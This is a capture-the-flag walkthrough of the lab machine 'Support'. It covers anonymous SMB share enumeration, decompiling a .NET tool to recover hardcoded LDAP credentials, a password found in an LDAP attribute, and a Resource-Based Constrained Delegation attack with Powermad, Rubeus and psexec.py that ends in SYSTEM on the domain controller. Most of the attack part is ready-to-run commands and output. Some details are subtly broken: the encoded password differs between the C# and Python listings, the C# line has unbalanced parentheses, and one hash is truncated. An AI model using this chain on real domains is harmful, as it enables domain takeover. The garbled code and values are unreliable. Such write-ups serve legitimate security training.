Introduction#

Support is an Easy Windows machine that begins with an open SMB share allowing anonymous access. Inside the share, a custom .NET executable UserInfo.exe is found. Reverse engineering or network analysis reveals LDAP credentials used by the binary. Those credentials are used to query the domain LDAP and discover a user support whose info attribute contains a password. This password grants WinRM access. On the machine, BloodHound analysis shows the Shared Support Accounts group (of which support is a member) has GenericAll on the Domain Controller. A Resource‑Based Constrained Delegation attack is performed to obtain a ticket for the Administrator and ultimately compromise the domain, yielding NT Authority\\System access.

Skills Required:

Basic Windows & Active Directory knowledge
Basic LDAP understanding

Skills Learned:

Anonymous SMB share enumeration
LDAP querying and information extraction
Resource‑Based Constrained Delegation (RBCD) exploitation

Enumeration#

Nmap Scan#

We begin with a full TCP scan against the target.

1
nmap -sC -sV -Pn 10.129.178.20

Nmap Output (relevant ports):

1
PORT     STATE SERVICE       VERSION
2
53/tcp   open  domain        Simple DNS Plus
3
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
4
135/tcp  open  msrpc         Microsoft Windows RPC
5
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
6
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
7
445/tcp  open  microsoft-ds?
8
464/tcp  open  kpasswd5?
9
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
10
636/tcp  open  tcpwrapped
11
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP
12
3269/tcp open  tcpwrapped
13
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
14
...

Numerous open ports indicate a Windows domain controller. Ports 389 (LDAP), 636 (LDAPS), 445 (SMB), and 5985 (WinRM) are especially interesting.

SMB Shares#

Let’s enumerate accessible SMB shares anonymously.

1
smbclient -L \\\\\\\\10.129.178.20\\\\

Output:

1
Sharename       Type      Comment
2
---------       ----      -------
3
ADMIN$          Disk      Remote Admin
4
C$              Disk      Default share
5
IPC$            IPC       Remote IPC
6
NETLOGON        Disk      Logon server share
7
support-tools   Disk      support staff tools
8
SYSVOL          Disk      Logon server share

The non‑default support-tools share catches our attention. Connect to it:

1
smbclient \\\\\\\\10.129.178.20\\\\support-tools

Listing the contents:

1
smb: \\> dir
2
  .                                   D        0  Wed Jul 20 20:01:06 2022
3
  ..                                  D        0  Sat May 28 14:18:25 2022
4
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 14:19:19 2022
5
  npp.8.4.1.portable.x64.zip         A  5439245  Sat May 28 14:19:55 2022
6
  putty.exe                           A  1273576  Sat May 28 14:20:06 2022
7
  SysinternalsSuite.zip               A 48102161  Sat May 28 14:19:31 2022
8
  UserInfo.exe.zip                    A   277499  Wed Jul 20 20:01:07 2022
9
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 14:20:17 2022
10
  WiresharkPortable64_3.6.5.paf.exe   A 44398000  Sat May 28 14:19:43 2022

The file UserInfo.exe.zip is not a standard tool. Download it for analysis.

1
smb: \\> get UserInfo.exe.zip

After exiting the SMB session, extract the archive:

1
unzip UserInfo.exe.zip

Extracted contents:

1
Archive:  UserInfo.exe.zip
2
  inflating: UserInfo.exe
3
  inflating: ... (several DLLs)

The main executable UserInfo.exe is a .NET assembly.

1
file UserInfo.exe

1
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

Reverse Engineering UserInfo.exe#

ILSpy Decompilation#

We use Avalonia ILSpy on Linux to decompile the binary. Download and run ILSpy, then load UserInfo.exe.

The decompiled source reveals a class Protected and a method ldapQuery():

1
public ldapQuery()
2
{
3
    string password = Protected.getPassword();
4
    entry = new DirectoryEntry("LDAP://support.htb", "support\\\\ldap", password);
5
    entry.set_AuthenticationType((AuthenticationTypes)1);
6
    ds = new DirectorySearcher(entry);
7
}

The password is retrieved from Protected.getPassword(), which XOR‑decrypts a hardcoded string.

1
internal class Protected
2
{
3
    private static string enc_password = "0Nv32PTwgyjzq9/8j5TbmvPd3e7WhtWwyuPsy076/Y+U193E";
4
    private static byte[] key = Encoding.ASCII.GetBytes("armando");
5

6
    public static string getPassword()
7
    {
8
        byte[] array = Convert.FromBase64String(enc_password);
9
        byte[] array2 = array;
10
        for (int i = 0; i < array.Length; i++)
11
        {
12
            array2[i] = (byte)(uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
13
        }
14
        return Encoding.Default.GetString(array2);
15
    }
16
}

We can replicate the decryption in Python:

1
import base64
2
from itertools import cycle
3

4
enc_password = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWwyuPsyO76/Y+U193E")
5
key = b"armando"
6
key2 = 223
7

8
res = ""
9
for e, k in zip(enc_password, cycle(key)):
10
    res += chr(e ^ k ^ key2)
11

12
print(res)

Decrypted password:

1
nvEfEK16^1aM4$e7Ac1Uf8x$tRWxPwO1%mz

LDAP Enumeration#

Now we have LDAP credentials. Add the hostname to /etc/hosts:

1
echo '10.129.178.20 support.htb' | sudo tee -a /etc/hosts

Use ldapsearch to query the domain:

1
ldapsearch -h support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7Ac1Uf8x$tRWxPwO1%mz' -b "dc=support,dc=htb" "*"

Sample output (truncated):

1
# support, Users, support.htb
2
dn: CN=support,CN=Users,DC=support,DC=htb
3
objectClass: top
4
objectClass: person
5
objectClass: organizationalPerson
6
objectClass: user
7
cn: support
8
...
9
info: Ironside47pleasure40Watchful
10
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
11
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
12
...

The info attribute holds what appears to be a password. The user support is a member of Remote Management Users, allowing WinRM access.

Alternative: Apache Directory Studio#

A graphical LDAP browser can also be used. After connecting with the same credentials, navigate to DC=support,DC=htb → CN=Users → CN=support. The info attribute is displayed in the right pane.

Apache Directory Studio – support user properties:

1
Attribute             Value
2
---------             -----
3
cn                    support
4
info                  Ironside47pleasure40Watchful
5
memberOf             CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
6
                     CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
7
...

Foothold#

With the password Ironside47pleasure40Watchful, connect via WinRM using Evil‑WinRM:

1
evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

1
Evil-WinRM shell v3.4
2
Info: Establishing connection to remote endpoint
3

4
*Evil-WinRM* PS C:\\Users\\support\\Documents> whoami
5
support\\support

The user flag is located at C:\\Users\\Support\\Desktop\\user.txt.

Privilege Escalation#

Domain Reconnaissance#

Check the Active Directory domain information:

1
Get-ADDomain

Output (key fields):

1
DistinguishedName          : DC=support,DC=htb
2
DNSRoot                    : support.htb
3
DomainMode                 : Windows2016Domain
4
InfrastructureMaster       : dc.support.htb
5
PDCEmulator                : dc.support.htb
6
...

The machine is the Domain Controller (dc.support.htb). Add it to /etc/hosts:

1
echo '10.129.178.20 dc.support.htb' | sudo tee -a /etc/hosts

Check current user’s group membership:

1
whoami /groups

Group list:

1
GROUP NAME                                    TYPE             SID
2
============================================= ================ ===============================================
3
Everyone                                      Well-known group S-1-1-0
4
BUILTIN\\Remote Management Users               Alias            S-1-5-32-580
5
BUILTIN\\Users                                 Alias            S-1-5-32-545
6
BUILTIN\\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554
7
NT AUTHORITY\\NETWORK                          Well-known group S-1-5-2
8
NT AUTHORITY\\Authenticated Users              Well-known group S-1-5-11
9
NT AUTHORITY\\This Organization                Well-known group S-1-5-15
10
SUPPORT\\Shared Support Accounts               Group            S-1-5-21-1677581083-3380853377-188903654-1103
11
NT AUTHORITY\\NTLM Authentication              Well-known group S-1-5-64-10
12
Mandatory Label\\Medium Mandatory Level        Label            S-1-16-8192

The Shared Support Accounts group is non‑default. Further BloodHound analysis reveals its privileges.

BloodHound Analysis#

Collect AD data using SharpHound. Upload the binary via Evil‑WinRM:

1
upload SharpHound.exe

Run the collector:

1
.\\SharpHound.exe -c All

Execution output:

1
2022-12-17T07:01:28.4071455-08:00|INFORMATION|SharpHound 1.1.0
2
2022-12-17T07:01:28.6993832-08:00|INFORMATION|Initializing SharpHound at 7:01 AM on 12/17/2022
3
...
4
2022-12-17T07:02:03.1816281-08:00|INFORMATION|Enumeration finished in 00:00:34.4972467

A ZIP file is created (e.g., 20221217070128_BloodHound.zip). Download it:

1
download 20221217070128_BloodHound.zip

Load the ZIP into BloodHound. Mark the user SUPPORT@SUPPORT.HTB as owned. View the node analysis:

BloodHound Node Info – Outbound Object Control:

1
First Degree Object Control          : 0
2
Group Delegated Object Control       : 1   <--- Click to expand
3
Transitive Object Control            : ...

Expanding the Group Delegated Object Control reveals:

1
Shared Support Accounts (SUPPORT.HTB) – GenericAll on DC.SUPPORT.HTB

BloodHound Help for GenericAll:

Full control of a computer object can be used to perform a resource‑based constrained delegation attack.

Abusing this primitive is currently only possible through the Rubeus project…

Because support is a member of Shared Support Accounts, which has GenericAll on the DC, we can perform an RBCD attack.

Resource‑Based Constrained Delegation (RBCD)#

Prerequisites#

The user is in Authenticated Users (default quota allows adding computers).
ms-ds-machineaccountquota must be > 0.

Check the quota:

1
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

Output:

1
ms-DS-MachineAccountQuota
2
----------------------------
3
                          10

The attribute msDS-AllowedToActOnBehalfOfOtherIdentity of the DC must be empty (we’ll verify later).

1. Create a Fake Computer Object#

Upload and import PowerMad.ps1:

1
. .\\Powermad.ps1

Create a new machine account:

1
New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)

Output:

1
[+] Machine account FAKE-COMP01 added

Verify:

1
Get-ADComputer -identity FAKE-COMP01

Output (SID highlighted):

1
DistinguishedName : CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb
2
Enabled           : True
3
Name              : FAKE-COMP01
4
ObjectClass       : computer
5
ObjectGUID        : ...
6
SamAccountName    : FAKE-COMP01$
7
SID               : S-1-5-21-1677581083-3380853377-188903654-5601
8
...

2. Configure the DC to Trust FAKE-COMP01#

Set the PrincipalsAllowedToDelegateToAccount on the DC:

1
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$

Verify:

1
Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount

Output:

1
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb}

Now confirm the underlying attribute:

1
Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity

Output (raw bytes):

1
msds-allowedtoactonbehalfofotheridentity
2
----------------------------------------
3
{1, 0, 4, 128, ...}

To see the interpreted Security Descriptor, convert the bytes:

1
$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
2
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
3
$Descriptor
4
$Descriptor.DiscretionaryAcl

Output:

1
ControlFlags     : DiscretionaryAclPresent, SelfRelative
2
Owner            : S-1-5-32-544
3
Group            :
4
DiscretionaryAcl : {System.Security.AccessControl.CommonAce}
5
...
6
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5601   (FAKE-COMP01)
7
AceType            : AccessAllowed
8
AccessMask         : 983551
9
...

The DC now allows FAKE-COMP01$ to delegate.

3. Perform the S4U Attack with Rubeus#

First, calculate the RC4 hash of the fake computer’s password using Rubeus:

1
.\\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb

Output:

1
   ______        _
2
  (_____ \\      | |
3
   _____) )_   _| |__  _____ _   _  ___
4
  |  __  /| | | |  _ \\| ___ | | | |/___)
5
  | |  \\ \\| |_| | |_) ) ____| |_| |___ |
6
  |_|   |_|____/|____/|_____)____/(___/
7

8
  v2.1.1
9

10
[*] Action: Calculate Password Hash(es)
11

12
[*] Input password             : Password123
13
[*] Input username             : FAKE-COMP01$
14
[*] Input domain               : support.htb
15
[*] Salt                       : SUPPORT.HTBhostfake-comp01.support.htb
16
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
17
[*]       aes128_cts_hmac_sha1 : 06C1EABAD3A21C24DF384247BC85C540
18
[*]       aes256_cts_hmac_sha1 : FF7BA224B544AA9700B2BEE94EADBA7855EF81A1E05B7EB33D4BCD55807FF53
19
[*]       des_cbc_md5          : 5B045E854358687C

Use the RC4 hash to request a service ticket for the Administrator:

1
.\\Rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

Output (last TGS ticket Base64 encoded):

1
   ______        _
2
  (_____ \\      | |
3
   _____) )_   _| |__  _____ _   _  ___
4
  |  __  /| | | |  _ \\| ___ | | | |/___)
5
  | |  \\ \\| |_| | |_) ) ____| |_| |___ |
6
  |_|   |_|____/|____/|_____)____/(___/
7

8
  v2.1.1
9

10
[*] Action: S4U
11

12
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
13
[*] Building AS-REQ (w/ preauth) for: 'support.htb\\FAKE-COMP01$'
14
[*] Using domain controller: ::1:88
15
[*] TGT request successful!
16
[*] base64(ticket.kirbi):
17
      doIFhDCCBYcgAwIBBaEDAgEwooIEmDCCBJRhggSOMIIE... <snip>
18

19
[*] Action: S4U
20
[*] Building S4U2self request for: 'FAKE-COMP01$@SUPPORT.HTB'
21
[*] Using domain controller: dc.support.htb (::1)
22
[*] Sending S4U2self request to ::1:88
23
[*] S4U2self success!
24
[*] Got a TGS for 'Administrator' to 'FAKE-COMP01$@SUPPORT.HTB'
25
[*] base64(ticket.kirbi):
26
      doIFrDCCBaigAwIBBaEDAgEwooIExJCCBMJhggs+MIIE... <snip>
27

28
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
29
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
30
[*] Using domain controller: dc.support.htb (::1)
31
[*] Sending S4U2proxy request to domain controller ::1:88
32
[*] S4U2proxy success!
33
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
34
      doIGaDCCBmSgAwIBBaEDAgEwooIEjeCCBXzhggVymII... (full Base64 ticket)
35
[*] Ticket successfully imported!

Important: Copy the last Base64 ticket and save it to a file ticket.kirbi.b64 (remove any whitespace).

4. Use the Ticket Locally#

Convert the Base64 ticket to a .kirbi file, then to a Linux‑compatible ccache file:

1
base64 -d ticket.kirbi.b64 > ticket.kirbi
2
ticketConverter.py ticket.kirbi ticket.ccache

Now use Impacket’s psexec.py to obtain a SYSTEM shell:

1
KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass

Shell output:

1
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
2

3
[*] Requesting shares on dc.support.htb...
4
[*] Found writable share ADMIN$
5
[*] Uploading file NeYKdoVH.exe
6
[*] Opening SVCManager on dc.support.htb...
7
[*] Creating service mba on dc.support.htb...
8
[*] Starting service mba...
9
[!] Press help for extra shell commands
10
Microsoft Windows [Version 10.0.20348.859]
11
(c) Microsoft Corporation. All rights reserved.
12

13
C:\\Windows\\system32> whoami
14
nt authority\\system

The root flag is located at C:\\Users\\Administrator\\Desktop\\root.txt.

Conclusion#

This machine demonstrated a realistic attack path:

Information Leakage via SMB – An internal tool left on an open share revealed LDAP credentials.
LDAP Enumeration – A user’s password stored in the info field gave initial access.
Active Directory Misconfiguration – Excessive rights (GenericAll) allowed a Resource‑Based Constrained Delegation attack, leading to full domain compromise.

By combining simple enumeration, credential discovery, and well‑known AD attack techniques, we gained SYSTEM access on the domain controller.